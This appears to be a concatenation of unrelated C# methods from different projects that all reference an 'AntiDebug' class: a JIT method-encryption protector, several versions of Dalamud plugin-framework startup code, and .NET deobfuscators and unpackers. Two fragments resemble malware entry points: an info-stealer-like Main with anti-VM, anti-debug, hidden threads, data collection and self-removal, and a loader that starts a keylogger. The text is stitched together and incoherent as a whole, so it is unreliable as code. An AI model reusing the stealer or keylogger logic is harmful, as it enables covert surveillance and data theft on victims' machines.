//delegate preperation & JIT Stack fixes private unsafe void PreJit() { Win32.Print("PreJIT: FindMatchingMethods"); MethodInfo method = typeof(JitEncrypt).GetMethod("FindMethods", BindingFlags.Instance | BindingFlags.NonPublic); RuntimeHelpers.PrepareMethod(method.MethodHandle); Win32.Print("PreJIT: ContainsKey"); method = typeof(Dictionary <long, JitMethodBase>).GetMethod("ContainsKey", BindingFlags.Instance | BindingFlags.Public); RuntimeHelpers.PrepareMethod(method.MethodHandle); Win32.Print("PreJIT: FindMatchingMethods [Call]"); //--- Note the following requests are required to prevent stack overflow exceptions on some deep .net methods that they call Data.CorMethodInfo64 methodInfo = new Data.CorMethodInfo64() //--- create fake data structure pointing to our fake method { moduleHandle = new IntPtr(int.MaxValue), methodHandle = new IntPtr(int.MaxValue - 0x06000000) }; JitMethodBase temp = new JitMethodBase(methodInfo.moduleHandle, int.MaxValue, method, new ClrEncrypted(EncryptionType.aes, false)); //--- define our fake method JitMethodBase temp2 = new JitMethodBase(methodInfo.moduleHandle, int.MaxValue, method, new MethodHash("fake method hash")); //--- define our fake method long value = temp.hMODULE.ToInt64() + temp.Token; //--- calculate our fake method's lookup token EncryptedMethods.Add(value, temp); //--- add our fake method to our dictioanry HashedMethods.Add(value, temp2); FindMethods(&methodInfo); // use FindMethods to PreJit the entire chain EncryptedMethods.Clear(); //--- clear our dictionary of our fake method to prevent issues HashedMethods.Clear(); if (AntiDebug.DetectDebuggers()) { Win32.Print("Debugger Present"); SafeCrash.ForceCrash(); } }
public void Dispose() { try { // this must be done before unloading plugins, or it can cause a race condition // due to rendering happening on another thread, where a plugin might receive // a render call after it has been disposed, which can crash if it attempts to // use any resources that it freed in its own Dispose method InterfaceManager?.Dispose(); try { PluginManager.UnloadPlugins(); } catch (Exception ex) { Log.Error(ex, "Plugin unload failed."); } Framework.Dispose(); ClientState.Dispose(); this.unloadSignal.Dispose(); WinSock2.Dispose(); SigScanner.Dispose(); Data.Dispose(); AntiDebug.Dispose(); Log.Debug("Dalamud::Dispose OK!"); } catch (Exception ex) { Log.Error(ex, "skjdgjjkodsfg"); } }
//delegate preperation & JIT Stack fixes private unsafe void PreJit() { Win32.Print("PreJIT: FindMatchingMethods"); MethodInfo method = typeof(JitEncrypt).GetMethod("FindMethods", BindingFlags.Instance | BindingFlags.NonPublic); System.Runtime.CompilerServices.RuntimeHelpers.PrepareMethod(method.MethodHandle); Win32.Print("PreJIT: DoesMatch"); method = typeof(JitMethodBase).GetMethod("DoesMatch", BindingFlags.Instance | BindingFlags.Public); System.Runtime.CompilerServices.RuntimeHelpers.PrepareMethod(method.MethodHandle); Win32.Print("PreJIT: FindMatchingMethods [Call]"); //--- Note the following requests are required to prevent stack overflow exceptions on some deep .net methods that they call Data.CorMethodInfo64 methodInfo = new Data.CorMethodInfo64() { moduleHandle = IntPtr.Zero, methodHandle = IntPtr.Zero }; FindMethods(&methodInfo); Win32.Print("PreJIT: DoesMatch [Call]"); JitMethodBase temp = new JitMethodBase(method.Module.GetHMODULE(), method.MetadataToken, method, new ClrEncrypted(EncryptionType.aes, false)); temp.DoesMatch(IntPtr.Zero, 0); if (AntiDebug.DetectDebuggers()) { Win32.Print("Debugger Present"); SafeCrash.ForceCrash(); } }
public unsafe void Enable() { PreJit(); //--- TODO: check MD5 of the assembly if (!_jitHook64.Hook(ClrCompile64)) { throw new Exception("Hook failed!"); } AntiDebug.StartForceBreak(); }
private unsafe int ClrCompile64(IntPtr thisPtr, [In] IntPtr corJitInfo, [In] Data.CorMethodInfo64 *methodInfo, Data.CorJitFlag flags, [Out] IntPtr nativeEntry, [Out] IntPtr nativeSizeOfCode) { JitMethodBase[] compiling_methods = FindMethods(methodInfo); //IntPtr corJitInfo_vTable = Marshal.ReadIntPtr(corJitInfo); if (compiling_methods.Length != 0) { //detect debuggers if (AntiDebug.DetectDebuggers()) { Win32.Print("On Compile - Debugger Present"); SafeCrash.ForceCrash(); } JitMethodBase method_base = compiling_methods[0]; Win32.Print($"Compiling: {method_base.Method.Name}"); if (compiling_methods.Length == 1) { //--- one matching method, HandleCompile we determine what to do HandleCompile(method_base, methodInfo); } else { //--- two matching methods, must handle decryption before hashing foreach (JitMethodBase method in compiling_methods) { if (method is EncryptedMethod encrypted) { HandleCompile(encrypted, methodInfo); break; } } foreach (JitMethodBase method in compiling_methods) { if (method is HashedMethod hashed) { HandleCompile(hashed, methodInfo); break; } } } } return(_jitHook64.OriginalCompileMethod(thisPtr, corJitInfo, methodInfo, flags, nativeEntry, nativeSizeOfCode)); }
static void Main(string[] args) { Debug.Assert(args.Length > 0); ModuleDefMD targetModule = ModuleDefMD.Load(args[0]); ModuleDefMD runtimeModule = ModuleDefMD.Load("Confuser.Runtime.dll"); ClarifierContext ctx = new ClarifierContext { CurrentModule = targetModule, WriterListener = new MWListener(), //ILLanguage = il }; AntiDump antiDump = new AntiDump(); AntiDebug antiDebug = new AntiDebug(); Constants constants = new Constants(); AntiTamper antiTamper = new AntiTamper(); Inliner inliner = new Inliner(); inliner.PerformIdentification(ctx); inliner.PerformRemoval(ctx); antiTamper.Initialize(); antiTamper.PerformIdentification(ctx); antiTamper.PerformRemoval(ctx); antiDump.Initialize(ctx); antiDump.PerformIdentification(ctx); antiDump.PerformRemoval(ctx); antiDebug.Initialize(ctx); antiDebug.PerformIdentification(ctx); antiDebug.PerformRemoval(ctx); constants.Initialize(ctx); constants.PerformIdentification(ctx); constants.PerformRemoval(ctx); int lastBackslash = args[0].LastIndexOf('\\'); string targetExecutable = args[0].Substring(lastBackslash + 1, args[0].Length - 1 - lastBackslash); string parentDir = Directory.GetParent(Directory.GetParent(args[0]).FullName).FullName; parentDir = Path.Combine(parentDir, "Deobfuscated"); string destinationFile = Path.Combine(parentDir, targetExecutable); targetModule.Write(destinationFile); return; }
private static void Main() { if (Program.AntiVM) { VMcheck.CheckAnti(); } if (Program.AntiDebugger) { Program.< > c__DisplayClass0_0 CS$ < > 8__locals1 = new Program.< > c__DisplayClass0_0(); if (AntiDebug.inDebugger()) { AntiDebug.badExit(); } Program.< > c__DisplayClass0_0 CS$ < > 8__locals2 = CS$ < > 8__locals1; Task[] array = new Task[1]; array[0] = new Task(delegate() { AntiDebug.StartAn(); }); CS$ < > 8__locals2.dd = array; new Thread(delegate() { Task[] dd = CS$ < > 8__locals1.dd; for (int i = 0; i < dd.Length; i++) { dd[i].Start(); } }).Start(); DebugProtect3.HideOSThreads(); } if (!File.Exists(Help.LocalData + "\\" + Help.HWID)) { Collection.GetCollection(); } else if (!File.ReadAllText(Help.LocalData + "\\" + Help.HWID).Contains(Help.HWID + Help.dateLog)) { Collection.GetCollection(); } else if (Program.doubleExecute) { Collection.GetCollection(); } else { Environment.Exit(0); } Clean.selfRemove(); Environment.Exit(0); }
public static bool Load() { //Initialize all features if (Settings.SystemProcess_CheckParentProcess) { AntiDebug.CheckParentProcess(); } if (SysMutex.CheckMutex() == false) { return(false); } //UsbSpread usbSpread = new UsbSpread(); //SystemProcess sysProc = new SystemProcess(); Keylogger keylog = new Keylogger(); //MsgBox msgbox = new MsgBox(); return(true); }
/// <summary> /// Perform basic checks, method 1 /// Checks are very fast, there is no CPU overhead. /// </summary> public static bool PerformChecks() { var isProcessRemote = AntiDebug.CheckRemoteDebugger(); var isManagedCodesAttached = AntiDebug.CheckDebuggerManagedPresent(); var isUnManagedCodesAttached = AntiDebug.CheckDebuggerUnmanagedPresent(); var checkDebugPort = AntiDebug.CheckDebugPort(); var checkKernelDebugInformation = AntiDebug.CheckKernelDebugInformation(); var detectEmulation = ProtectionHelper.DetectEmulation(); var detectSandbox = ProtectionHelper.DetectSandbox(); var detectVirtualMachine = ProtectionHelper.DetectVirtualMachine(); var detachFromDebuggerProcess = AntiDebug.DetachFromDebuggerProcess(); WriteBooleanResult($"{nameof(AntiDebug)}.{nameof(AntiDebug.CheckRemoteDebugger)}", isProcessRemote); WriteBooleanResult($"{nameof(AntiDebug)}.{nameof(AntiDebug.CheckDebuggerManagedPresent)}", isManagedCodesAttached); WriteBooleanResult($"{nameof(AntiDebug)}.{nameof(AntiDebug.CheckDebuggerUnmanagedPresent)}", isUnManagedCodesAttached); WriteBooleanResult($"{nameof(AntiDebug)}.{nameof(AntiDebug.CheckDebugPort)}", checkDebugPort); WriteBooleanResult($"{nameof(AntiDebug)}.{nameof(AntiDebug.CheckKernelDebugInformation)}", checkKernelDebugInformation); WriteBooleanResult($"{nameof(ProtectionHelper)}.{nameof(ProtectionHelper.DetectEmulation)}", detectEmulation); WriteBooleanResult($"{nameof(ProtectionHelper)}.{nameof(ProtectionHelper.DetectSandbox)}", detectSandbox); WriteBooleanResult($"{nameof(ProtectionHelper)}.{nameof(ProtectionHelper.DetectVirtualMachine)}", detectVirtualMachine); WriteBooleanResult($"{nameof(AntiDebug)}.{nameof(AntiDebug.DetachFromDebuggerProcess)}", detachFromDebuggerProcess); AntiDebug.HideOsThreads(); Scanner.ScanAndKill(); if (isProcessRemote || isManagedCodesAttached || isUnManagedCodesAttached || checkDebugPort || checkKernelDebugInformation || detectEmulation || detectSandbox || detectVirtualMachine) { ProtectionHelper.FreezeMouse(); ProtectionHelper.ShowCmd("Protector", "Active debugger found!", "C"); return(true); } return(false); }
/// <summary> /// Start and initialize Dalamud subsystems. /// </summary> public void Start() { try { this.Configuration = DalamudConfiguration.Load(this.StartInfo.ConfigurationPath); // Initialize the process information. this.TargetModule = Process.GetCurrentProcess().MainModule; this.SigScanner = new SigScanner(this.TargetModule, true); Log.Information("[START] Scanner OK!"); this.AntiDebug = new AntiDebug(this.SigScanner); #if DEBUG AntiDebug.Enable(); #endif Log.Information("[START] AntiDebug OK!"); // Initialize game subsystem this.Framework = new Framework(this.SigScanner, this); Log.Information("[START] Framework OK!"); this.WinSock2 = new WinSockHandlers(); Log.Information("[START] WinSock OK!"); this.NetworkHandlers = new NetworkHandlers(this, this.StartInfo.OptOutMbCollection); Log.Information("[START] NH OK!"); this.ClientState = new ClientState(this, this.StartInfo, this.SigScanner); Log.Information("[START] CS OK!"); this.LocalizationManager = new Localization(Path.Combine(this.AssetDirectory.FullName, "UIRes", "loc", "dalamud"), "dalamud_"); if (!string.IsNullOrEmpty(this.Configuration.LanguageOverride)) { this.LocalizationManager.SetupWithLangCode(this.Configuration.LanguageOverride); } else { this.LocalizationManager.SetupWithUiCulture(); } Log.Information("[START] LOC OK!"); this.PluginRepository = new PluginRepository(this, this.StartInfo.PluginDirectory, this.StartInfo.GameVersion); Log.Information("[START] PREPO OK!"); var isInterfaceLoaded = false; if (!bool.Parse(Environment.GetEnvironmentVariable("DALAMUD_NOT_HAVE_INTERFACE") ?? "false")) { try { this.InterfaceManager = new InterfaceManager(this, this.SigScanner); this.InterfaceManager.Enable(); isInterfaceLoaded = true; Log.Information("[START] IM OK!"); this.InterfaceManager.WaitForFontRebuild(); } catch (Exception e) { Log.Information(e, "Could not init interface."); } } this.Data = new DataManager(this.StartInfo.Language, this.InterfaceManager); try { this.Data.Initialize(this.AssetDirectory.FullName); } catch (Exception e) { Log.Error(e, "Could not initialize DataManager."); this.Unload(); return; } Log.Information("[START] Data OK!"); this.SeStringManager = new SeStringManager(this.Data); Log.Information("[START] SeString OK!"); // Initialize managers. Basically handlers for the logic this.CommandManager = new CommandManager(this, this.StartInfo.Language); this.DalamudCommands = new DalamudCommands(this); this.DalamudCommands.SetupCommands(); Log.Information("[START] CM OK!"); this.ChatHandlers = new ChatHandlers(this); Log.Information("[START] CH OK!"); if (!bool.Parse(Environment.GetEnvironmentVariable("DALAMUD_NOT_HAVE_PLUGINS") ?? "false")) { try { this.PluginRepository.CleanupPlugins(); Log.Information("[START] PRC OK!"); this.PluginManager = new PluginManager( this, this.StartInfo.PluginDirectory, this.StartInfo.DefaultPluginDirectory); this.PluginManager.LoadPlugins(); Log.Information("[START] PM OK!"); } catch (Exception ex) { Log.Error(ex, "Plugin load failed."); } } this.Framework.Enable(); Log.Information("[START] Framework ENABLE!"); this.ClientState.Enable(); Log.Information("[START] CS ENABLE!"); this.DalamudUi = new DalamudInterface(this); this.InterfaceManager.OnDraw += this.DalamudUi.Draw; Log.Information("[START] DUI OK!"); this.IsReady = true; Troubleshooting.LogTroubleshooting(this, isInterfaceLoaded); Log.Information("Dalamud is ready."); } catch (Exception ex) { Log.Error(ex, "Dalamud::Start() failed."); this.Unload(); } }
public Dalamud(DalamudStartInfo info, LoggingLevelSwitch loggingLevelSwitch) { this.StartInfo = info; this.loggingLevelSwitch = loggingLevelSwitch; this.Configuration = DalamudConfiguration.Load(info.ConfigurationPath); this.baseDirectory = info.WorkingDirectory; this.unloadSignal = new ManualResetEvent(false); // Initialize the process information. this.targetModule = Process.GetCurrentProcess().MainModule; this.SigScanner = new SigScanner(this.targetModule, true); // Initialize game subsystem this.Framework = new Framework(this.SigScanner, this); this.WinSock2 = new WinSockHandlers(); NetworkHandlers = new NetworkHandlers(this, this.Configuration.OptOutMbCollection); this.ClientState = new ClientState(this, info, this.SigScanner); Task.Run(async() => { try { var res = await AssetManager.EnsureAssets(this.baseDirectory); if (!res) { Log.Error("One or more assets failed to download."); Unload(); return; } } catch (Exception e) { Log.Error(e, "Error in asset task."); Unload(); return; } this.LocalizationManager = new Localization(this.StartInfo.WorkingDirectory); if (!string.IsNullOrEmpty(this.Configuration.LanguageOverride)) { this.LocalizationManager.SetupWithLangCode(this.Configuration.LanguageOverride); } else { this.LocalizationManager.SetupWithUiCulture(); } PluginRepository = new PluginRepository(this, this.StartInfo.PluginDirectory, this.StartInfo.GameVersion); var isInterfaceLoaded = false; if (!bool.Parse(Environment.GetEnvironmentVariable("DALAMUD_NOT_HAVE_INTERFACE") ?? "false")) { try { InterfaceManager = new InterfaceManager(this, this.SigScanner); InterfaceManager.OnDraw += BuildDalamudUi; InterfaceManager.Enable(); isInterfaceLoaded = true; } catch (Exception e) { Log.Information(e, "Could not init interface."); } } Data = new DataManager(this.StartInfo.Language); try { await Data.Initialize(this.baseDirectory); } catch (Exception e) { Log.Error(e, "Could not initialize DataManager."); Unload(); return; } SeStringManager = new SeStringManager(Data); #if DEBUG AntiDebug = new AntiDebug(this.SigScanner); AntiDebug.Enable(); #endif // Initialize managers. Basically handlers for the logic CommandManager = new CommandManager(this, info.Language); SetupCommands(); ChatHandlers = new ChatHandlers(this); if (!bool.Parse(Environment.GetEnvironmentVariable("DALAMUD_NOT_HAVE_PLUGINS") ?? "false")) { try { PluginRepository.CleanupPlugins(); PluginManager = new PluginManager(this, this.StartInfo.PluginDirectory, this.StartInfo.DefaultPluginDirectory); PluginManager.LoadPlugins(); } catch (Exception ex) { Log.Error(ex, "Plugin load failed."); } } this.Framework.Enable(); this.ClientState.Enable(); IsReady = true; Troubleshooting.LogTroubleshooting(this, isInterfaceLoaded); }); }
private void BuildDalamudUi() { if (!this.isImguiDrawDevMenu && !ClientState.Condition.Any()) { ImGui.PushStyleColor(ImGuiCol.Button, new Vector4(0, 0, 0, 0)); ImGui.PushStyleColor(ImGuiCol.ButtonActive, new Vector4(0, 0, 0, 0)); ImGui.PushStyleColor(ImGuiCol.ButtonHovered, new Vector4(0, 0, 0, 0)); ImGui.PushStyleColor(ImGuiCol.Text, new Vector4(0, 0, 0, 1)); ImGui.PushStyleColor(ImGuiCol.TextSelectedBg, new Vector4(0, 0, 0, 1)); ImGui.PushStyleColor(ImGuiCol.Border, new Vector4(0, 0, 0, 1)); ImGui.PushStyleColor(ImGuiCol.BorderShadow, new Vector4(0, 0, 0, 1)); ImGui.PushStyleColor(ImGuiCol.WindowBg, new Vector4(0, 0, 0, 1)); ImGui.SetNextWindowPos(new Vector2(0, 0), ImGuiCond.Always); ImGui.SetNextWindowBgAlpha(1); if (ImGui.Begin("DevMenu Opener", ImGuiWindowFlags.AlwaysAutoResize | ImGuiWindowFlags.NoBackground | ImGuiWindowFlags.NoDecoration | ImGuiWindowFlags.NoMove | ImGuiWindowFlags.NoScrollbar | ImGuiWindowFlags.NoResize | ImGuiWindowFlags.NoSavedSettings)) { if (ImGui.Button("###devMenuOpener", new Vector2(40, 25))) { this.isImguiDrawDevMenu = true; } ImGui.End(); } ImGui.PopStyleColor(8); } if (this.isImguiDrawDevMenu) { if (ImGui.BeginMainMenuBar()) { if (ImGui.BeginMenu("Dalamud")) { ImGui.MenuItem("Draw Dalamud dev menu", "", ref this.isImguiDrawDevMenu); ImGui.Separator(); if (ImGui.MenuItem("Open Log window")) { this.logWindow = new DalamudLogWindow(CommandManager); this.isImguiDrawLogWindow = true; } if (ImGui.BeginMenu("Set log level...")) { foreach (var logLevel in Enum.GetValues(typeof(LogEventLevel)).Cast <LogEventLevel>()) { if (ImGui.MenuItem(logLevel + "##logLevelSwitch", "", this.loggingLevelSwitch.MinimumLevel == logLevel)) { this.loggingLevelSwitch.MinimumLevel = logLevel; } } ImGui.EndMenu(); } if (AntiDebug == null && ImGui.MenuItem("Enable AntiDebug")) { AntiDebug = new AntiDebug(this.SigScanner); AntiDebug.Enable(); } ImGui.Separator(); if (ImGui.MenuItem("Open Data window")) { this.dataWindow = new DalamudDataWindow(this); this.isImguiDrawDataWindow = true; } if (ImGui.MenuItem("Open Credits window")) { OnOpenCreditsCommand(null, null); } if (ImGui.MenuItem("Open Settings window")) { OnOpenSettingsCommand(null, null); } if (ImGui.MenuItem("Open Changelog window")) { OpenChangelog(); } ImGui.MenuItem("Draw ImGui demo", "", ref this.isImguiDrawDemoWindow); if (ImGui.MenuItem("Dump ImGui info")) { OnDebugImInfoCommand(null, null); } ImGui.Separator(); if (ImGui.MenuItem("Unload Dalamud")) { Unload(); } if (ImGui.MenuItem("Kill game")) { Process.GetCurrentProcess().Kill(); } if (ImGui.MenuItem("Cause AccessViolation")) { var a = Marshal.ReadByte(IntPtr.Zero); } ImGui.Separator(); ImGui.MenuItem(Util.AssemblyVersion, false); ImGui.MenuItem(this.StartInfo.GameVersion, false); ImGui.EndMenu(); } if (ImGui.BeginMenu("Game")) { if (ImGui.MenuItem("Replace ExceptionHandler")) { ReplaceExceptionHandler(); } ImGui.EndMenu(); } if (ImGui.BeginMenu("Plugins")) { if (ImGui.MenuItem("Open Plugin installer")) { this.pluginWindow = new PluginInstallerWindow(this, this.StartInfo.GameVersion); this.isImguiDrawPluginWindow = true; } ImGui.Separator(); if (ImGui.MenuItem("Open Plugin Stats")) { if (!this.isImguiDrawPluginStatWindow) { this.pluginStatWindow = new DalamudPluginStatWindow(this.PluginManager); this.isImguiDrawPluginStatWindow = true; } } if (ImGui.MenuItem("Print plugin info")) { foreach (var plugin in this.PluginManager.Plugins) { // TODO: some more here, state maybe? Log.Information($"{plugin.Plugin.Name}"); } } if (ImGui.MenuItem("Reload plugins")) { OnPluginReloadCommand(string.Empty, string.Empty); } ImGui.Separator(); ImGui.MenuItem("API Level:" + PluginManager.DALAMUD_API_LEVEL, false); ImGui.MenuItem("Loaded plugins:" + PluginManager?.Plugins.Count, false); ImGui.EndMenu(); } if (ImGui.BeginMenu("Localization")) { if (ImGui.MenuItem("Export localizable")) { Loc.ExportLocalizable(); } if (ImGui.BeginMenu("Load language...")) { if (ImGui.MenuItem("From Fallbacks")) { Loc.SetupWithFallbacks(); } if (ImGui.MenuItem("From UICulture")) { this.LocalizationManager.SetupWithUiCulture(); } foreach (var applicableLangCode in Localization.ApplicableLangCodes) { if (ImGui.MenuItem($"Applicable: {applicableLangCode}")) { this.LocalizationManager.SetupWithLangCode(applicableLangCode); } } ImGui.EndMenu(); } ImGui.EndMenu(); } if (this.Framework.Gui.GameUiHidden) { ImGui.BeginMenu("UI is hidden...", false); } ImGui.EndMainMenuBar(); } } if (this.Framework.Gui.GameUiHidden) { return; } if (this.isImguiDrawLogWindow) { this.isImguiDrawLogWindow = this.logWindow != null && this.logWindow.Draw(); if (this.isImguiDrawLogWindow == false) { this.logWindow?.Dispose(); this.logWindow = null; } } if (this.isImguiDrawDataWindow) { this.isImguiDrawDataWindow = this.dataWindow != null && this.dataWindow.Draw(); } if (this.isImguiDrawPluginWindow) { this.isImguiDrawPluginWindow = this.pluginWindow != null && this.pluginWindow.Draw(); if (!this.isImguiDrawPluginWindow) { this.pluginWindow = null; } } if (this.isImguiDrawCreditsWindow) { this.isImguiDrawCreditsWindow = this.creditsWindow != null && this.creditsWindow.Draw(); if (this.isImguiDrawCreditsWindow == false) { this.creditsWindow?.Dispose(); this.creditsWindow = null; } } if (this.isImguiDrawSettingsWindow) { this.isImguiDrawSettingsWindow = this.settingsWindow != null && this.settingsWindow.Draw(); } if (this.isImguiDrawDemoWindow) { ImGui.ShowDemoWindow(); } if (this.isImguiDrawPluginStatWindow) { this.isImguiDrawPluginStatWindow = this.pluginStatWindow != null && this.pluginStatWindow.Draw(); if (!this.isImguiDrawPluginStatWindow) { this.pluginStatWindow?.Dispose(); this.pluginStatWindow = null; } } if (this.isImguiDrawChangelogWindow) { this.isImguiDrawChangelogWindow = this.changelogWindow != null && this.changelogWindow.Draw(); } }
static void Main(string[] args) { Console.Title = "DeConfuser - The De-Obfuscator for confuser v1.6"; Console.WriteLine("Copyright © DragonHunter - 2012"); Console.WriteLine("This deobfuscator might not work at every confused assembly, still BETA"); Console.WriteLine("Checkout this project at http://deconfuser.codeplex.com"); Console.WriteLine("Thanks also to Mono.Cecil there was no DeConfuser without Mono.Cecil"); Console.WriteLine("This version of Mono.Cecil is modded by DragonHunter to do some evil shit"); //hardcoded path atm... string inputPath = @"H:\DeConfuser\ConfuseMe\bin\Debug\confused\ConfuseMe.exe"; string outputPath = @"H:\DeConfuser\ConfuseMe\bin\Debug\confused\ConfuseMe_cleaned.exe"; //load assembly AssemblyDefinition asm = AssemblyFactory.GetAssembly(inputPath); #region Anti-Debug remover AntiDebug debug = new AntiDebug(); TypeDefinition AntiType = null; MethodDefinition AntiMethod = null; Console.WriteLine("-------------------------------------------------------"); if (debug.FindAntiDebug(asm, ref AntiType, ref AntiMethod)) { Console.WriteLine("[Anti-Debugger] Anti-Debugger detected, removing..."); debug.RemoveAntiDebug(asm, AntiType, AntiMethod); Console.WriteLine("[Anti-Debugger] Removed anti-debugger"); } else { Console.WriteLine("This assembly is not protected with anti-debugging"); } Console.WriteLine("-------------------------------------------------------"); #endregion #region String Decryptor StringDecrypter decrypter = new StringDecrypter(); TypeDefinition DecryptType = null; MethodDefinition DecryptMethod = null; if (decrypter.FindMethod(asm, ref DecryptType, ref DecryptMethod)) { Console.WriteLine("[String Decryptor] Found string decryptor, decrypting strings..."); byte[] StringData = decrypter.GetStringResource(asm, inputPath, DecryptMethod); decrypter.DecryptAllStrings(asm, DecryptMethod, StringData); decrypter.RemoveDecryptMethod(asm, DecryptType, DecryptMethod); Console.WriteLine("[String Decryptor] Removed the decrypt method"); } else { Console.WriteLine("This assembly is not protected with encrypted strings"); } Console.WriteLine("-------------------------------------------------------"); #endregion #region Anti-Dump remover AntiDump dump = new AntiDump(); TypeDefinition AntiDumpType = null; MethodDefinition AntiDumpMethod = null; if (dump.FindAntiDump(asm, ref AntiDumpType, ref AntiDumpMethod)) { Console.WriteLine("[Anti-Dump] Anti-Dump detected, removing..."); dump.RemoveAntiDump(asm, AntiDumpType, AntiDumpMethod); Console.WriteLine("[Anti-Dump] Removed anti-dump"); } else { Console.WriteLine("This assembly is not protected with anti-dump"); } Console.WriteLine("-------------------------------------------------------"); #endregion #region Resource Decryptor ResourceDecrypter resourceDecrypter = new ResourceDecrypter(); TypeDefinition ResourceType = null; MethodDefinition ResourceMethod = null; if (resourceDecrypter.FindMethod(asm, ref ResourceType, ref ResourceMethod)) { Console.WriteLine("[Resource-Decrypter] Resource-Decrypter, decrypting"); resourceDecrypter.DecryptAllResources(asm, inputPath, ResourceType, ResourceMethod); } else { Console.WriteLine("This assembly is not protected with encrypted resources"); } Console.WriteLine("-------------------------------------------------------"); #endregion AssemblyFactory.SaveAssembly(asm, outputPath); Console.WriteLine("File dumped to \"" + outputPath + "\""); Console.WriteLine("Thanks for using DeConfuser :)"); Process.GetCurrentProcess().WaitForExit(); }
public void Start() { Configuration = DalamudConfiguration.Load(StartInfo.ConfigurationPath); // Initialize the process information. TargetModule = Process.GetCurrentProcess().MainModule; SigScanner = new SigScanner(TargetModule, true); AntiDebug = new AntiDebug(SigScanner); #if DEBUG AntiDebug.Enable(); #endif // Initialize game subsystem Framework = new Framework(SigScanner, this); WinSock2 = new WinSockHandlers(); NetworkHandlers = new NetworkHandlers(this, StartInfo.OptOutMbCollection); ClientState = new ClientState(this, StartInfo, SigScanner); LocalizationManager = new Localization(AssetDirectory.FullName); if (!string.IsNullOrEmpty(Configuration.LanguageOverride)) { LocalizationManager.SetupWithLangCode(Configuration.LanguageOverride); } else { LocalizationManager.SetupWithUiCulture(); } PluginRepository = new PluginRepository(this, StartInfo.PluginDirectory, StartInfo.GameVersion); DalamudUi = new DalamudInterface(this); var isInterfaceLoaded = false; if (!bool.Parse(Environment.GetEnvironmentVariable("DALAMUD_NOT_HAVE_INTERFACE") ?? "false")) { try { InterfaceManager = new InterfaceManager(this, SigScanner); InterfaceManager.OnDraw += DalamudUi.Draw; InterfaceManager.Enable(); isInterfaceLoaded = true; } catch (Exception e) { Log.Information(e, "Could not init interface."); } } Data = new DataManager(StartInfo.Language); try { Data.Initialize(AssetDirectory.FullName); } catch (Exception e) { Log.Error(e, "Could not initialize DataManager."); Unload(); return; } SeStringManager = new SeStringManager(Data); // Initialize managers. Basically handlers for the logic CommandManager = new CommandManager(this, StartInfo.Language); DalamudCommands = new DalamudCommands(this); DalamudCommands.SetupCommands(); ChatHandlers = new ChatHandlers(this); if (!bool.Parse(Environment.GetEnvironmentVariable("DALAMUD_NOT_HAVE_PLUGINS") ?? "false")) { try { PluginRepository.CleanupPlugins(); PluginManager = new PluginManager(this, StartInfo.PluginDirectory, StartInfo.DefaultPluginDirectory); PluginManager.LoadPlugins(); } catch (Exception ex) { Log.Error(ex, "Plugin load failed."); } } Framework.Enable(); ClientState.Enable(); IsReady = true; Troubleshooting.LogTroubleshooting(this, isInterfaceLoaded); Log.Information("Dalamud is ready."); }
static void Main(string[] args) { #region Initialize Console.Title = "Rzy Protector V2 Unpacker - by illuZion#9999"; WriteTitle(); if (args.Length != 1) { Write("Please, drag 'n' drop the file to unpack!", Type.Error); Leave(); } string directory = args[0]; try { Module = ModuleDefMD.Load(directory); } catch { Write("Not a .NET Assembly...", Type.Error); Leave(); } #endregion Initialize #region Unpack HideMethods.Execute(Module); CallToCalli.Execute(Module); EmptyTypes.Execute(Module); Maths(Module); LocalToField.Execute(Module); Constants.Execute(Module); Maths(Module); StringProtection.Execute(Module); FakeObfuscator.Execute(Module); AntiIlDasm.Execute(Module); AntiDe4dot.Execute(Module); AntiDnspy.Execute(Module); AntiVm.Execute(Module); AntiDebug.Execute(Module); AntiDump.Execute(Module); RemoveNops.Execute(Module); #endregion Unpack #region Save the file Write("Saving the unpacked file..."); string text = Path.GetDirectoryName(directory); if (text == null) { Leave(); } // We can disable the possible null exception as the Leave method closes the program (but Resharper does not detect it). // ReSharper disable once PossibleNullReferenceException text += !text.EndsWith("\\") ? "\\" : null; string filename = $"{text}{Path.GetFileNameWithoutExtension(directory)}-Unpacked{Path.GetExtension(directory)}"; var writerOptions = new ModuleWriterOptions(Module); writerOptions.MetadataOptions.Flags |= MetadataFlags.PreserveAll; writerOptions.Logger = DummyLogger.NoThrowInstance; var nativewriterOptions = new NativeModuleWriterOptions(Module, true); nativewriterOptions.MetadataOptions.Flags |= MetadataFlags.PreserveAll; nativewriterOptions.Logger = DummyLogger.NoThrowInstance; if (Module.IsILOnly) { Module.Write(filename, writerOptions); } else { Module.NativeWrite(filename, nativewriterOptions); } Write($"File saved at: {filename}", Type.Success); Leave(); #endregion Save the file }